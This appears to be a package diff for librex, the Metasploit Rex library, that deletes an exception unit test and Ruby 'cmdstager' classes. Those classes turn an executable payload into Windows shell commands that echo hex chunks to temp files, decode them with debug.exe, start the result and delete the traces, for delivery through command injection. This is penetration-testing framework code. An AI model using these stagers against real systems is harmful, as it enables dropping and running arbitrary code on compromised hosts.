librex 0.0.13 → 0.0.15

data/lib/rex/exceptions.rb.ut.rb

@@ -1,44 +0,0 @@
-#!/usr/bin/env ruby
-
-$:.unshift(File.join(File.dirname(__FILE__), '..'))
-
-require 'test/unit'
-require 'rex/exceptions'
-
-module Rex
-module Exceptions
-
-class UnitTest < Test::Unit::TestCase
-
-	def test_exceptions
-		Rex.constants.each { |const|
-			mod = Rex.const_get(const)
-
-			if ((mod.kind_of?(Class) == false) ||
-			    (mod.ancestors.include?(Rex::Exception) == false))
-				next
-			end
-
-			begin
-				raise mod.new
-			rescue ::ArgumentError
-			rescue mod => detail
-				assert_respond_to(detail, 'to_s', "#{mod} does not implement to_s")
-				assert_not_nil(detail.to_s, "invalid to_s")
-			end
-		}
-
-		# Test communication error detail strings
-		begin
-			raise ConnectionRefused.new('127.0.0.1', 4444)
-		rescue HostCommunicationError => detail
-			assert_match(/^The connection(.*)\(127.0.0.1:4444\)/, detail.to_s)
-			assert_equal('127.0.0.1', detail.host)
-			assert_equal(4444, detail.port)
-		end
-	end
-
-end
-
-end
-end

data/lib/rex/exploitation/cmdstager.rb

@@ -1,9 +0,0 @@
-##
-# $Id: cmdstager.rb 9375 2010-05-26 22:39:56Z jduck $
-##
-
-require 'rex/exploitation/cmdstager/base'
-require 'rex/exploitation/cmdstager/vbs'
-require 'rex/exploitation/cmdstager/debug_write'
-require 'rex/exploitation/cmdstager/debug_asm'
-require 'rex/exploitation/cmdstager/tftp'

data/lib/rex/exploitation/cmdstager/base.rb

@@ -1,175 +0,0 @@
-require 'rex/text'
-require 'rex/arch'
-require 'msf/core/framework'
-
-module Rex
-module Exploitation
-
-###
-#
-# This class provides an interface to generating cmdstagers.
-#
-###
-
-class CmdStagerBase
-
-	def initialize(exe)
-		@linemax     = 2047 # covers most likely cases
-		@exe         = exe
-	end
-
-	#
-	# Generates the cmd payload including the h2bv2 decoder and encoded payload.
-	# The resulting commands also perform cleanup, removing any left over files
-	#
-	def generate(opts = {})
-		# Allow temporary directory override
-		@tempdir = opts[:temp]
-		@tempdir ||= "%TEMP%\\"
-		if (@tempdir == '.')
-			@tempdir = ''
-		end
-
-		opts[:linemax] ||= @linemax
-
-		generate_cmds(opts)
-	end
-
-
-	#
-	# This does the work of actually building an array of commands that
-	# when executed will create and run an executable payload.
-	#
-	def generate_cmds(opts)
-
-		# Initialize an arry of commands to execute
-		cmds = []
-
-		# Add the exe building commands
-		cmds += generate_cmds_payload(opts)
-
-		# Add the decoder script building commands
-		cmds += generate_cmds_decoder(opts)
-
-		compress_commands(cmds, opts)
-	end
-
-
-	#
-	# Generate the commands to create an encoded version of the
-	# payload file
-	#
-	def generate_cmds_payload(opts)
-
-		# First encode the payload
-		encoded = encode_payload(opts)
-
-		# Now split it up into usable pieces
-		parts = slice_up_payload(encoded, opts)
-
-		# Turn each part into a valid command
-		parts_to_commands(parts, opts)
-	end
-
-	#
-	# This method is intended to be override by the child class
-	#
-	def encode_payload(opts)
-		# Defaults to nothing
-		""
-	end
-
-	#
-	# We take a string of data and turn it into an array of parts.
-	#
-	# We save opts[:extra] bytes out of every opts[:linemax] for the parts
-	# appended and prepended to the resulting elements.
-	#
-	def slice_up_payload(encoded, opts)
-		tmp = encoded.dup
-
-		parts = []
-		xtra_len = opts[:extra]
-		xtra_len ||= 0
-		while (tmp.length > 0)
-			parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
-		end
-
-		parts
-	end
-
-	#
-	# Combine the parts of the encoded file with the stuff that goes
-	# before / after it -- example "echo " and " >>file"
-	#
-	def parts_to_commands(parts, opts)
-		# Return as-is
-		parts
-	end
-
-
-
-	#
-	# Generate the commands that will decode the file we just created
-	#
-	def generate_cmds_decoder(opts)
-		# Defaults to no commands.
-		[]
-	end
-
-
-
-	#
-	# Compress commands into as few lines as possible. Minimizes the number of
-	# commands to execute while maximizing the number of commands per execution.
-	#
-	def compress_commands(cmds, opts)
-		new_cmds = []
-		line = ''
-		concat = cmd_concat_operator
-
-		# We cannot compress commands if there is no way to combine commands on
-		# a single line.
-		return cmds if not concat
-
-		cmds.each { |cmd|
-
-			# If this command will fit, concat it and move on.
-			if ((line.length + cmd.length + concat.length) < opts[:linemax])
-				line << concat if line.length > 0
-				line << cmd
-				next
-			end
-
-			# The command wont fit concat'd to this line, if we have something,
-			# we have to add it to the array now.
-			if (line.length > 0)
-				new_cmds << line
-				line = ''
-			end
-
-			# If it won't fit even after emptying the current line, error out..
-			if (cmd.length > opts[:linemax])
-				raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
-			end
-
-			# It will indeed fit by itself, lets add it.
-			line << cmd
-
-		}
-		new_cmds << line if (line.length > 0)
-
-		# Return the final array.
-		new_cmds
-	end
-
-	#
-	# Can be overriden.  For exmaple, use for unix use ";" instead
-	#
-	def cmd_concat_operator
-		nil
-	end
-
-end
-end
-end

data/lib/rex/exploitation/cmdstager/debug_asm.rb

@@ -1,142 +0,0 @@
-##
-# $Id$
-##
-
-require 'rex/text'
-require 'rex/arch'
-require 'msf/core/framework'
-
-module Rex
-module Exploitation
-
-###
-#
-# This class provides the ability to create a sequence of commands from an executable.
-# When this sequence is ran via command injection or a shell, the resulting exe will 
-# be written to disk and executed.
-#
-# This particular version uses debug.exe to assemble a small COM file. The COM will
-# take a hex-ascii file, created via echo >>, and decode it to the final binary.
-#
-# Requires: debug.exe
-#
-# Written by Joshua J. Drake
-#
-###
-
-class CmdStagerDebugAsm < CmdStagerBase
-
-	def initialize(exe)
-		super
-
-		@var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
-		@var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
-		@var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
-		@var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
-		@decoder          = nil # filled in later
-	end
-
-
-	#
-	# Override just to set the extra byte count
-	#
-	def generate_cmds(opts)
-		# Set the start/end of the commands here (vs initialize) so we have @tempdir
-		@cmd_start = "echo "
-		@cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
-		xtra_len = @cmd_start.length + @cmd_end.length + 1
-		opts.merge!({ :extra => xtra_len })
-		super
-	end
-
-
-	#
-	# Simple hex encoding...
-	#
-	def encode_payload(opts)
-		ret = @exe.unpack('H*')[0]
-	end
-
-
-	#
-	# Combine the parts of the encoded file with the stuff that goes
-	# before / after it.
-	#
-	def parts_to_commands(parts, opts)
-
-		cmds = []
-		parts.each do |p|
-			cmd = ''
-			cmd << @cmd_start
-			cmd << p
-			cmd << @cmd_end
-			cmds << cmd
-		end
-
-		cmds
-	end
-
-
-	#
-	# Generate the commands that will decode the file we just created
-	#
-	def generate_cmds_decoder(opts)
-
-		# Allow decoder stub override (needs to input base64 and output bin)
-		@decoder = opts[:decoder] if (opts[:decoder])
-
-		# Read the decoder data file
-		f = File.new(@decoder, "rb")
-		decoder = f.read(f.stat.size)
-		f.close
-
-		# Replace variables
-		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
-		decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
-		# NOTE: these two filenames MUST 8+3 chars long.
-		decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
-		decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
-
-		# Split it apart by the lines
-		decoder.split("\n")
-	end
-
-
-	#
-	# We override compress commands just to stick in a few extra commands
-	# last second..
-	#
-	def compress_commands(cmds, opts)
-		# Convert the debug script to an executable...
-		cvt_cmd = ''
-		if (@tempdir != '')
-			cvt_cmd << "cd %TEMP% && "
-		end
-		cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
-		cmds << cvt_cmd
-
-		# Convert the encoded payload...
-		cmds << "#{@tempdir}#{@var_decoder_com}"
-
-		# Make it all happen
-		cmds << "start #{@tempdir}#{@var_payload_out}"
-
-		# Clean up after unless requested not to..
-		if (not opts[:nodelete])
-			cmds << "del #{@tempdir}#{@var_decoder_asm}"
-			cmds << "del #{@tempdir}#{@var_decoder_com}"
-			cmds << "del #{@tempdir}#{@var_payload_in}"
-			# XXX: We won't be able to delete the payload while it is running..
-		end
-
-		super
-	end
-
-	# Windows uses & to concat strings
-	def cmd_concat_operator
-		" & "
-	end
-
-end
-end
-end

data/lib/rex/exploitation/cmdstager/debug_write.rb

@@ -1,136 +0,0 @@
-##
-# $Id$
-##
-
-require 'rex/text'
-require 'rex/arch'
-require 'msf/core/framework'
-
-module Rex
-module Exploitation
-
-###
-#
-# This class provides the ability to create a sequence of commands from an executable.
-# When this sequence is ran via command injection or a shell, the resulting exe will 
-# be written to disk and executed.
-#
-# This particular version uses debug.exe to write a small .NET binary. That binary will
-# take a hex-ascii file, created via echo >>, and decode it to the final binary.
-#
-# Requires: .NET, debug.exe
-#
-###
-
-class CmdStagerDebugWrite < CmdStagerBase
-
-	def initialize(exe)
-		super
-
-		@var_bypass  = Rex::Text.rand_text_alpha(8)
-		@var_payload = Rex::Text.rand_text_alpha(8)
-		@decoder     = nil # filled in later
-	end
-
-
-	#
-	# Override just to set the extra byte count
-	#
-	def generate_cmds(opts)
-		# Set the start/end of the commands here (vs initialize) so we have @tempdir
-		@cmd_start = "echo "
-		@cmd_end   = ">>#{@tempdir}#{@var_payload}"
-		xtra_len = @cmd_start.length + @cmd_end.length + 1
-		opts.merge!({ :extra => xtra_len })
-		super
-	end
-
-
-	#
-	# Simple hex encoding...
-	#
-	def encode_payload(opts)
-		@exe.unpack('H*')[0]
-	end
-
-
-	#
-	# Combine the parts of the encoded file with the stuff that goes
-	# before / after it.
-	#
-	def parts_to_commands(parts, opts)
-
-		cmds = []
-		parts.each do |p|
-			cmd = ''
-			cmd << @cmd_start
-			cmd << p
-			cmd << @cmd_end
-			cmds << cmd
-		end
-
-		cmds
-	end
-
-
-	#
-	# Generate the commands that will decode the file we just created
-	#
-	def generate_cmds_decoder(opts)
-
-		# Allow decoder stub override (needs to input base64 and output bin)
-		@decoder = opts[:decoder] if (opts[:decoder])
-
-		# Read the decoder data file
-		f = File.new(@decoder, "rb")
-		decoder = f.read(f.stat.size)
-		f.close
-
-		# Replace variables
-		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
-
-		# Split it apart by the lines
-		decoder.split("\n")
-	end
-
-
-	#
-	# We override compress commands just to stick in a few extra commands
-	# last second..
-	#
-	def compress_commands(cmds, opts)
-		# Convert the debug script to an executable...
-		cvt_cmd = ''
-		if (@tempdir != '')
-			cvt_cmd << "cd %TEMP% && "
-		end
-		cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
-		cmds << cvt_cmd
-
-		# Rename the resulting binary
-		cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
-
-		# Converting the encoded payload...
-		cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
-
-		# Make it all happen
-		cmds << "start #{@tempdir}#{@var_payload}.exe"
-
-		# Clean up after unless requested not to..
-		if (not opts[:nodelete])
-			cmds << "del #{@tempdir}#{@var_bypass}.exe"
-			cmds << "del #{@tempdir}#{@var_payload}"
-			# XXX: We won't be able to delete the payload while it is running..
-		end
-
-		super
-	end
-
-	# Windows uses & to concat strings
-	def cmd_concat_operator
-		" & "
-	end
-
-end
-end
-end